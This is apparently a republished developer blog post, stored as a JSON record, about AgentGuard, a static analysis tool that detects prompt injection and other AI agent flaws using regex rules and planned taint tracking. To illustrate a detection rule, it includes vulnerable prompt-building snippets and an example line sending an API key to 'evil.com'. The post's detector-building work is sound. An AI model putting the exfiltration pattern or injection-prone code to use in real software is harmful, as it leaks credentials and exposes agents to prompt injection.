{"slug": "beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities", "title": "Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities", "summary": "AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.", "body_md": "When I started building [AgentGuard](https://github.com/dockfixlabs/agentguard), the first question was: how do you detect a prompt injection vulnerability in source code?\n\nUnlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of **untrusted data flowing into LLM context**. The vulnerability isn't in a function call -- it's in how data is constructed.\n\nEvery SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:\n\n```\nimport re\n\n# ASI01: Prompt Injection\nFSTRING_INJECTION = re.compile(\n    r'(?:prompt|system|message|instruction)\\s*[:=]\\s*f[\"\\'].*\\{.*\\}',\n    re.I\n)\n```\n\nThis catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.\n\nRegex has limits. Consider:\n\n```\n# Pattern A: Obvious\nprompt = f\"You are a helper. {user_input}\"\n\n# Pattern B: Subtle\ntemplate = \"You are a helper. {input}\"\nprompt = template.format(input=user_data)\n\n# Pattern C: Hidden\nmessages = [{\"role\": \"system\", \"content\": config[\"system_prompt\"] + user_message}]\n```\n\nPattern A is trivial to detect. Pattern B requires understanding `.format()` semantics. 
Pattern C requires tracking data flow through dictionaries and list construction.\n\nThis is where AgentGuard is headed next: **AST-based semantic analysis**.\n\nThe next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:\n\n- Sources: `user_input`, `query`, `message`, `request.body`\n- Sinks: `openai.chat.completions.create`, `prompt`, `messages`, `system`\n\nThis is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.\n\nAgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):\n\n```\n# Line 1: Secret access\napi_key = os.environ.get(\"API_KEY\")\n\n# Line 2: Network call\nrequests.post(\"https://evil.com/collect\", headers={\"Auth\": api_key})\n```\n\nThe rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.\n\nFuture versions will extend this to full function-level taint tracking.\n\nAgentGuard currently covers all 10 categories:\n\n| ASI | Rule | Detection Method |\n|---|---|---|\n| ASI01 | Prompt Injection | Regex (f-string, concat, format) |\n| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |\n| ASI03 | Data Exfiltration | Regex + cross-line correlation |\n| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |\n| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |\n| ASI06 | Insecure Output | Regex (raw HTML, eval output) |\n| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |\n| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |\n| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |\n| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |\n\nThe [benchmark suite](https://github.com/dockfixlabs/agentguard-benchmark) has 28 samples.\n\nThe long-term goal is 
simple: **make AI agent code as auditable as web application code**. We have Semgrep for web apps. We need AgentGuard for agent apps.\n\n[AgentGuard](https://github.com/dockfixlabs/agentguard) is MIT-licensed and open source. Install with `pip install dfx-agentguard`.", "url": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities", "canonical_source": "https://dev.to/dockfixlabs/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities-hi3", "published_at": "2026-06-28 22:45:51+00:00", "updated_at": "2026-06-28 23:27:13.248149+00:00", "lang": "en", "topics": ["ai-safety", "ai-agents", "developer-tools", "large-language-models", "ai-research"], "entities": ["AgentGuard", "Dockfix Labs", "Semgrep", "CodeQL", "ASI01", "ASI03", "Python", "JavaScript"], "alternates": {"html": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities", "markdown": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities.md", "text": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities.txt", "jsonld": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities.jsonld"}}